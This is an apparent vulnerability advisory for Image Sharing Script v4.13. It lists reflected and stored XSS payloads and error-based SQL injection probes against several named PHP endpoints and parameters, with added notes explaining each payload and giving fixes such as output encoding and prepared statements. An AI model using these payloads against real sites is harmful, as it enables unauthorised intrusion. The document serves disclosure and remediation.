Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerabilities
|
|
Author : Hasan Emre Ozer
|
|
Google Dork : -
|
|
Date : 16/01/2017
|
|
Type : webapps
|
|
Platform: PHP
|
|
Vendor Homepage : http://itechscripts.com/image-sharing-script/
|
|
Software Price and Demo : $1250
|
|
http://photo-sharing.itechscripts.com/
|
|
|
|
--------------------------------
|
|
Type: Reflected XSS
|
|
Vulnerable URL: http://localhost/[PATH]/searchpin.php
|
|
Vulnerable Parameters : q=
|
|
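Payload:"><img src=i onerror=prompt(1)>
Note: the leading "> closes an open attribute and tag, which suggests q is echoed into an HTML attribute value without output encoding. Encoding q for the HTML context on output (in PHP, htmlspecialchars() with ENT_QUOTES) neutralises this; the same payload is listed below for the token parameter of categorypage.php.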
|
|
-------------------------------
|
|
Type: Error-Based SQL Injection
|
|
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
|
|
Vulnerable Parameters: pid
|
|
Method: GET
|
|
Payload: ' AND (SELECT 2674 FROM(SELECT
|
|
COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
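INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
Note: this payload is a confirmation probe, not a data read: the inner ELT(2674=2674,1) only yields the constant 1, and 0x717a717671 / 0x717a6a6b71 decode to the delimiter strings "qzqvq" / "qzjkq" that surround it in the resulting MySQL error. Those delimiters appearing in a response, or FLOOR(RAND(0)*2) with GROUP BY appearing in request logs, indicate the parameter is concatenated into the query and that SQL errors are shown to the client. The fix is to bind pid as a prepared-statement parameter and to stop returning database error text; the same probe is listed below for token, id and brdId.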
|
|
-------------------------------
|
|
Type: Error-Based SQL Injection
|
|
Vulnerable URL:http://localhost/[PATH]/categorypage.php
|
|
Vulnerable Parameters: token
|
|
Method: GET
|
|
Payload: ' AND (SELECT 2674 FROM(SELECT
|
|
COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
|
|
|
|
--------------------------------
|
|
Type: Reflected XSS
|
|
Vulnerable URL: http://localhost/[PATH]/categorypage.php
|
|
Vulnerable Parameters : token
|
|
Payload:"><img src=i onerror=prompt(1)>
|
|
|
|
-------------------------------
|
|
Type: Stored XSS
|
|
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
|
|
Method: POST
|
|
Vulnerable Parameters : &text=
|
|
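Payload:<img src=i onerror=prompt(1)>
Note: as a stored XSS the comment text is saved and, presumably, rendered to every visitor who views the comment, so it should be HTML-encoded at output time (htmlspecialchars() in PHP) wherever comments are displayed; validating only at submission leaves already-stored entries active.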
|
|
--------------------------------
|
|
Type: Error-Based SQL Injection
|
|
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
|
|
Vulnerable Parameters: id
|
|
Method: POST
|
|
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
|
|
---------------------------------
|
|
Type: Error-Based SQL Injection
|
|
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
|
|
Vulnerable Parameters: brdId
|
|
Method: POST
|
|
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
|
|
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH